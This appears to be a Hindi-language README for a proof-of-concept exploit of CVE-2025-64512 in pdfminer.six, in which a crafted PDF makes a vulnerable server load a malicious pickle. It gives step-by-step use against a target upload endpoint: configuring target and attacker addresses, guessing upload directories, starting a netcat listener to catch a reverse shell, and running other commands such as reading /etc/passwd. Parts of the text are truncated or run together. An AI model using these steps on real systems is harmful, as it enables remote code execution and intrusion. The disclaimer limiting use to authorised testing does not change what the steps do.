
CVE-2025-64512 के लिए एक्सप्लॉइट जो रिवर्स शेल प्राप्त करता है।
यह प्रूफ-ऑफ-कॉन्सेप्ट pdfminer.six (CVE-2025-64512) में एक भेद्यता प्रदर्शित करता है, जो किसी दुर्भावनापूर्ण PDF के प्रोसेस होने पर मनमाना कमांड निष्पादन का कारण बन सकती है। एक्सप्लॉइट एक क्राफ्टेड PDF का उपयोग करता है जो एक दुर्भावनापूर्ण, gzip-संपीड़ित Python pickle को संदर्भित करती है। जब भेद्य एप्लिकेशन PDF को पार्स करता है, तो वह pickle को लोड करता है और एम्बेडेड पेलोड को निष्पादित करता है।
इसमें शामिल PoC एक Python रिवर्स शेल निष्पादित करने के लिए कॉन्फ़िगर किया गया है, लेकिन पेलोड को किसी भी कमांड से बदला जा सकता है।
requestsआवश्यक निर्भरता स्थापित करें:
pip install requests
एक्सप्लॉइट चलाने से पहले, exploit.py के कॉन्फ़िगरेशन अनुभाग को संपादित करें:
BASE_URL = ""
UPLOAD_DIR = ""
LHOST = ""
LPORT = 4444
भेद्य अपलोड एंडपॉइंट का URL।
उदाहरण:
BASE_URL = "http://target/upload.php"
एक्सप्लॉइट दुर्भावनापूर्ण PDF और संपीड़ित pickle दोनों को इस एंडपॉइंट पर अपलोड करता है।
टारगेट पर वह पूर्ण निर्देशिका जहाँ अपलोड की गई फ़ाइलें संग्रहीत होती हैं।
उदाहरण:
UPLOAD_DIR = "/var/www/html/uploads"
यह पथ जनरेट की गई PDF के अंदर एम्बेड किया जाता है और उस स्थान से मेल खाना चाहिए जहाँ से भेद्य एप्लिकेशन बाद में अपलोड किए गए pickle को पढ़ेगा।
यदि अपलोड निर्देशिका अज्ञात है, तो enumeration के दौरान इसे निर्धारित करें। एप्लिकेशन के आधार पर, उपयोगी तकनीकों में शामिल हैं:
सामान्य स्थानों में शामिल हैं:
/var/www/html/uploads
/var/www/uploads
/srv/www/uploads
/opt/application/uploads
सही निर्देशिका पूरी तरह से टारगेट एप्लिकेशन पर निर्भर करती है।
आपका लिसनर IP पता।
उदाहरण:
LHOST = "10.10.14.5"
रिवर्स शेल के लिए लिसनिंग पोर्ट।
उदाहरण:
LPORT = 4444
एक्सप्लॉइट चलाने से पहले एक लिसनर प्रारंभ करें:
nc -lvnp 4444
एक्सप्लॉइट निष्पादित करें:
python3 exploit.py
स्क्रिप्ट निम्नलिखित कार्य करेगी:
evil.pickle.gz में संपीड़ित करेगी।रिवर्स शेल के बजाय, निम्नलिखित को पास किए गए कमांड को संशोधित करके कोई भी ऑपरेटिंग सिस्टम कमांड निष्पादित किया जा सकता है:
create_pickle_with_cmd(command)
उदाहरणों में शामिल हैं:
id
whoami
uname -a
cat /etc/passwd
यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान और अधिकृत पेनेट्रेशन टेस्टिंग के लिए प्रदान किया गया है। इसका उपयोग केवल उन्हीं सिस्टमों पर करें जिन पर सुरक्षा परीक्षण करने की आपके पास स्पष्ट अनुमति है।